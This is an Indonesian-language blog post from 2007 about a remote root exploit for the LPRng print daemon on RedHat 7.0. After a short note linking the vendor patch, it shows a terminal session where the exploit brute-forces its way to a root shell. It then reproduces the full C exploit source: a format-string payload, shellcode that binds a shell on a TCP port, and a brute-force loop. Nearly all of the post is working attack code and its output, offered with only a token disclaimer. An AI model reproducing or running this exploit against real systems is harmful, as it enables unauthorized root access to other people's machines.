Tentang IT dan Komputer

Teknologi Informasi

Hacking Ke RedHat 7.0

Posted by intrik on July 14, 2007

Menjelang tahun baru 2001, Redhat versi terbaru, yaitu RedHat 7.0 mendapat tamparan yang cukup kencang dari kelompok security netcat. kelompok ini membuat sebuah program yang mampu meng-exploit security bug yang terdapat pada lpd dimana pada bug ini memungkinkan remote user untuk mendapatkan root akses.
Berikut adalah percobaan yang telah dilakukan oleh pihak jasakom dalam menggunakan exploit yang telah di sebar luaskan pada security team di internet pada jam 3 pagi waktu indonesia. Pihak jasakom yang menggunakan RedHat 7.0 dengan port lpd yang terbuka melakukan exploit pada web server di lab jasakom. Pada bug yg obatnya ada di http://www.redhat.com/support/errata/RHSA-2000-065-06.html atau updatenya di ftp://updates.redhat.com/7.0/i386/LPRng-3.6.24-2.i386.rpm ftp://updates.redhat.com/7.0/SRPMS/LPRng-3.6.24-2.src.rpm
diperkirakan akan banyak dipakai oleh orang-orang tidak bertanggung jawab dalam melakukan deface ke web server.

Berikut adalah hasil percobaan dari pihak jasakom :
[root@localhost /test]# ls
SEClpd.c.txt SElpd SElpd.c saint
[root@localhost /test]# ./SElpd 127.0.0.1 -t 0
+++ http://www.netcat.it remote exploit for LPRng/lpd

+++ Exploit information
+++ Victim: 127.0.0.1
+++ Type: 0 – RedHat 7.0 – Guinesss
+++ Eip address: 0xbffff3ec
+++ Shellcode address: 0xbffff7f2
+++ Position: 300
+++ Alignment: 2
+++ Offset 0

+++ Attacking 127.0.0.1 with our format string
Argh exploit failed$#%! try brute force!

Percobaan pertama gagal, kemudian dilakukan exploit dengan menggunakan brute dan inilah hasilnya :

[root@localhost /test]# ./SElpd 127.0.0.1 brute -t 0
+++ http://www.netcat.it remote exploit for LPRng/lpd

+++ Exploit information
+++ Victim: 127.0.0.1
+++ Type: 0 – RedHat 7.0 – Guinesss
+++ Eip address: 0xbffff3ec
+++ Shellcode address: 0xbffff7f2
+++ Position: 300
+++ Alignment: 2
+++ Offset 0

+++ Attacking 127.0.0.1 with our format string
+++ Brute force man, relax and enjoy the ride ;>
+++ The eip_address is 0xbffff3d8

– [+] shell located on 127.0.0.1
– [+] Enter Commands at will

Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:16:55 EDT 2000 i586 unkno
wn
uid=0(root) gid=7(lp)
ls      
<- Bingo !!! anda telah berhasil
bin
boot
dev
etc
home
lib
lost+found
misc
mnt
opt
proc
root
sbin
test
tmp
usr
var
cd etc
ls
CORBA
DIR_COLORS
Muttrc
X11
adjtime
aliases
aliases.db
anacrontab
at.deny
auto.master
auto.misc
bashrc
cdrecord.conf
conf.linuxconf
cron.d
cron.daily
cron.hourly
cron.monthly
cron.weekly
crontab
csh.cshrc
csh.login
default
dhcpc
dhcpcd
dumpdates
enscript.cfg
esd.conf
exports
fdprm
filesystems
fnrc
fstab
ftpaccess
ftpconversions
ftpgroups
ftphosts
ftpusers
gettydefs
gnome
gpm-root.conf
group
group-
gshadow
gshadow-
gtk
gtk-2.0
host.conf
hosts
hosts.allow
hosts.deny
httpd
identd.conf
im
im_palette-small.pal
im_palette-tiny.pal
im_palette.pal
imrc
info-dir
init.d
initlog.conf
inittab
inputrc
ioctl.save
isapnp.gone
isdn
issue
issue.net
krb5.conf
lam
ld.so.cache
ld.so.conf
ldap.conf
lilo.conf
localtime
login.defs
logrotate.conf
logrotate.d
lpd.conf
lpd.perms
ltrace.conf
lynx.cfg
mail
mail.rc
mailcap
makedev.d
man.config
mc.global
mesa.conf
mgetty+sendfax
midi
mime-magic
mime-magic.dat
mime.types
minicom.users
modules.conf
motd
mtab
mtools.conf
my.conf
news
nmh
nsswitch.conf
odbc.ini
odbcinst.ini
openldap
opt
pam.d
pango
paper.config
passwd
passwd-
passwd.OLD
pbm2ppa.conf
pcmcia
php.ini
pine.conf
pine.conf.fixed
pluggerrc
pnm2ppa.conf
ppp
printcap
profile
profile.d
protocols
pwdb.conf
rc
rc.d
rc.local
rc.news
rc.sysinit
rc0.d
rc1.d
rc2.d
rc3.d
rc4.d
rc5.d
rc6.d
redhat-release
resolv.conf
rmt
rpc
rpm
rpmlint
samba
sane.d
screenrc
securetty
security
sendmail.cf
sensors.conf
services
shadow-
shells
skel
smrsh
snmp
sound
squid
ssh
sysconfig
sysctl.conf
syslog.conf
termcap
updatedb.conf
uucp
wgetrc
xinetd.conf
xinetd.d
yp.conf
ypserv.conf
pwd            
<- melihat direktory
/etc

Berikut adalah program yang digunakan. Semoga anda tidak melakukan hal-hal yang merusak denganya, karena pihak jasakom tidak bertanggung jawab atas code ini😉


/*
*
* http://www.netcat.it Presents: LPRng/Linux remote root lpd exploit.
*
* NetCat.it – admin@netcat.it
*
* Please Sysadmin Patch your Box!
* Please RedHat.com, release a patch!
*
* Run: ./SEClpd victim brute -t type
* Try first ./SEClpd victim -t 0 then try the brute.
*
* This exploit can be download from http://www.netcat.it
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define ADDRESS_BUFFER_SIZE 32+4
#define APPEND_BUFFER_SIZE 52
#define FORMAT_LENGTH 512-8
#define NOPCOUNT 200
#define SHELLCODE_COUNT 1030
#define DELAY 50000 /* usecs */
#define OFFSET_LIMIT 5000

char shellcode[] =

“\x31\xdb\x31\xc9\x31\xc0\xb0\x46\xcd\x80”
“\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8”
“\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89”
“\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0”
“\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd”
“\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9”
“\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75”
“\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08”
“\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh”;

struct target
{
char *os_name;
u_long eip_address;
u_long shellcode_address;
unsigned int position;
int written_bytes;
int align;
};

struct target targets[] =
{
{ “RedHat 7.0 – Guinesss “, 0xbffff3ec, 0L, 300, 70, 2, },
{ “RedHat 7.0 – Guinesss-dev”, 0xbffff12c, 0L, 300, 70, 2, },
{
NULL, 0L, 0L, 0, 0, 0
}
};

static char address_buffer[ADDRESS_BUFFER_SIZE+1];
static char append_buffer[APPEND_BUFFER_SIZE+1];
static char shellcode_buffer[1024];
static char *hostname=NULL;
static int offset;
static struct hostent *he;
int type=-1;
int brute=-1, failure=1;

void calculate_rets(u_long eip_addr, u_long shellcode_addr, u_int previous, u_int addr_loc)
{
int i;
unsigned int tmp = 0;
unsigned int copied = previous;
unsigned int num[4] =
{
(unsigned int) (shellcode_addr & 0x000000ff),
(unsigned int)((shellcode_addr & 0x0000ff00) >> 8),
(unsigned int)((shellcode_addr & 0x00ff0000) >> 16),
(unsigned int)((shellcode_addr & 0xff000000) >> 24)
};

memset (address_buffer, ”, sizeof(address_buffer));
memset (append_buffer, ”, sizeof(append_buffer));

for (i = 0; i < 4; i++)
{
while (copied > 0x100)
copied -= 0x100;

if ( (i > 0) && (num[i-1] == num[i]) )
sprintf (append_buffer+strlen(append_buffer), “%%%d$n”, addr_loc+i);
else if (copied < num[i])
{
if ( (num[i] – copied) <= 10)
{
sprintf (append_buffer+strlen(append_buffer), “%.*s”,
(int)(num[i] – copied), “www.netcat.it”);
copied += (num[i] – copied);
sprintf (append_buffer+strlen(append_buffer), “%%%d$n”, addr_loc+i); } else {
sprintf (append_buffer+strlen(append_buffer), “%%.%du”,
num[i] – copied);
copied += (num[i] – copied);
sprintf (append_buffer+strlen(append_buffer), “%%%d$n”, addr_loc+i); }
} else {
tmp = ((num[i] + 0x100) – copied);
sprintf (append_buffer+strlen(append_buffer), “%%.%du”, tmp);
copied += ((num[i] + 0x100) – copied);
sprintf (append_buffer+strlen(append_buffer), “%%%d$n”, addr_loc+i);
}

sprintf (address_buffer+strlen(address_buffer), “%c%c%c%c”,
(unsigned char) ((eip_addr+i) & 0x000000ff),
(unsigned char)(((eip_addr+i) & 0x0000ff00) >> 8),
(unsigned char)(((eip_addr+i) & 0x00ff0000) >> 16),
(unsigned char)(((eip_addr+i) & 0xff000000) >> 24));
}

while (strlen(address_buffer) < ADDRESS_BUFFER_SIZE)
strcat (address_buffer, “X”);

#ifdef DEBUG
printf (“\nGeneration complete:\nAddress: “);
for (i = 0; i < strlen(address_buffer); i++)
{
if ( ((i % 4) == 0) && (i > 0) )
printf (“.”);
printf (“%02x”, (unsigned char)address_buffer[i]);
}
printf (“\nAppend: %s\n”, append_buffer);
#endif

return;
}

char *create_malicious_string(void)
{
static char format_buffer[FORMAT_LENGTH+1];
long addr1,addr2;
int i;

memset (format_buffer, ”, sizeof(format_buffer));

targets[type].shellcode_address = targets[type].eip_address + SHELLCODE_COUNT;

addr1 = targets[type].eip_address;
addr2 = targets[type].shellcode_address;
calculate_rets (addr1, addr2,targets[type].written_bytes, targets[type].position);

(void)snprintf (format_buffer, sizeof(format_buffer)-1, “%.*s%s”,
targets[type].align, “BBBB”, address_buffer);

strncpy (address_buffer, format_buffer, sizeof(address_buffer)-1);
strncpy (format_buffer, append_buffer, sizeof(format_buffer)-1);

for(i = 0 ; i < NOPCOUNT ; i++)
strcat(format_buffer, “\x90”);

strcat(format_buffer, shellcode);

return (format_buffer);
}

int connect_victim()
{

int sockfd, n;
struct sockaddr_in s;
fd_set fd_stat;
char buff[1024];

static char testcmd[256] = “/bin/uname -a ; id ;\r\n”;

s.sin_family = AF_INET;
s.sin_port = htons (3879);
s.sin_addr.s_addr = *(u_long *)he->h_addr;

if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0)
{
printf (“— [5] Unable to create socket!\n”);
printf(“Exploit failed!\n”);
return -1;
}

if ((connect (sockfd, (struct sockaddr *) &s, sizeof (s))) < 0)
{
return -1;
}

if(brute)

printf(“+++ The eip_address is 0x%x\n\n”, targets[type].eip_address);

printf(“- [+] shell located on %s\n”, hostname);
printf(“- [+] Enter Commands at will\n\n”);

failure = -1;

FD_ZERO(&fd_stat);
FD_SET(sockfd, &fd_stat);
send(sockfd, testcmd, strlen(testcmd), 0);

while(1) {

FD_SET(sockfd,&fd_stat);
FD_SET(0,&fd_stat);

if(select(sockfd+1,&fd_stat,NULL,NULL,NULL)<0) break;
if( FD_ISSET(sockfd, &fd_stat) ) {
if((n=read(sockfd,buff,sizeof(buff)))<0){
fprintf(stderr, “EOF\n”);
return 2;
}

if(write(1,buff,n)<0)break;
}
if ( FD_ISSET(0, &fd_stat) ) {
if((n=read(0,buff,sizeof(buff)))<0){
fprintf(stderr,”EOF\n”);
return 2;
}

if(send(sockfd,buff,n,0)<0) break;

}
}
}

void send_code(char *exploit_buffer)
{

int sockfd, n;
struct sockaddr_in s;
fd_set fd_stat;
char recv[1024];
static char testcmd[256] = “/bin/uname -a ; id ;\r\n”;

s.sin_family = AF_INET;
s.sin_port = htons (515);
s.sin_addr.s_addr = *(u_long *)he->h_addr;

if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0)
{
printf (“— [5] Unable to create socket!\n”);
printf(“Exploit failed!\n”);
exit(-1);
}

if ((connect (sockfd, (struct sockaddr *) &s, sizeof (s))) < 0)
{
printf (“— [5] Unable to connect to %s\n”, hostname);
printf(“Exploit failed, %s is not running LPD!\n”, hostname);
exit(-1);
}

usleep(DELAY);

if(write (sockfd, exploit_buffer, strlen(exploit_buffer)) < 0)
{
printf (“Couldn’t write to socket %d”, sockfd);
printf (“Exploit failed\n”);
exit(2);
}

close(sockfd);
connect_victim();

}

void usage(char *program)
{

int i=0;

printf(“SEClpd by http://www.netcat.it ! \n\n”);
printf(“Usage: %s victim [\”brute\”] -t type [-o offset] [-a align] [-p position] [-r eip_addr] [-c shell_addr] [-w written_bytes] \n\n”, program);
printf(“ie: ./SEClpd localhost -t 0 For most redhat 7.0 boxes\n”);
printf(“ie: ./SEClpd localhost brute -t 0 For brute forcing all redhat 7.0 boxes\n”);
printf(“Types:\n\n”);

while( targets[i].os_name != NULL)
printf (“[ Type %d: [ %s ]\n”, i++, targets[i].os_name);
}

int main(int argc, char **argv)
{

char exploit_buffer[1024];
char *format = NULL;
int c, brutecount=0;

if(argc < 3)
{
usage(argv[0]);
return 1;
}

hostname = argv[1];

if(!strncmp(argv[2], “brute”, 5)) brute = 1;

while(( c = getopt (argc, argv, “t:r:c:a:o:p:w:k”))!= EOF){

switch (c)
{

case ‘t’:
type = atoi(optarg);
break;

case ‘r’:
targets[type].eip_address = strtoul(optarg, NULL, 16);
break;

case ‘c’:
targets[type].shellcode_address = strtoul(optarg, NULL, 16);
break;

case ‘a’:
targets[type].align = atoi(optarg);
break;

case ‘o’:
offset = atoi(optarg);
break;

case ‘p’:
targets[type].position = atoi(optarg);
break;

case ‘w’:
targets[type].written_bytes = atoi(optarg);
break;

default:
usage(argv[0]);
return 1;
}
}

if(type < 0)
{
printf(“You must specify a type!\n”);
printf(“example: ./SEClpd victim -t 0\n”);
return -1;
}

if ( (he = gethostbyname (hostname)) == NULL)
{
herror(“gethostbyname”);
exit(1);
}

targets[type].shellcode_address = targets[type].eip_address + SHELLCODE_COUNT;

printf(“+++ http://www.netcat.it remote exploit for LPRng/lpd \n\n”);

printf(“+++ Exploit information\n”);
printf(“+++ Victim: %s\n”, hostname);
printf(“+++ Type: %d – %s\n”, type, targets[type].os_name);
printf(“+++ Eip address: 0x%x\n”, targets[type].eip_address);
printf(“+++ Shellcode address: 0x%x\n”, targets[type].shellcode_address);
printf(“+++ Position: %d\n”, targets[type].position);
printf(“+++ Alignment: %d\n”, targets[type].align);
printf(“+++ Offset %d\n”, offset);
printf(“\n”);

printf(“+++ Attacking %s with our format string\n”, hostname);

if( brute > 0 )
{

printf(“+++ Brute force man, relax and enjoy the ride ;>\n”);
targets[type].eip_address = 0xbffffff0;

while(failure)

{
memset(exploit_buffer, ”, sizeof(exploit_buffer));

format = create_malicious_string();
strcpy(exploit_buffer, address_buffer);
strcat(exploit_buffer, format);
strcat(exploit_buffer, “\n”);
send_code(exploit_buffer);

targets[type].eip_address = 0xbffffff0 – offset;

offset+=4;

if (offset > OFFSET_LIMIT) {
printf(“+++ Offset limit hit, ending brute mode ;<\n”);
return -1;

}
}
}

else

format = create_malicious_string();
strcpy(exploit_buffer, address_buffer);
strcat(exploit_buffer, format);
strcat(exploit_buffer, “\n”);
send_code(exploit_buffer);

printf(“Argh exploit failed$#%! try brute force!\n”);

return (-1);
}

[- Ruthness – S’to -]

Source: JASAKOM Information Center

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
%d bloggers like this: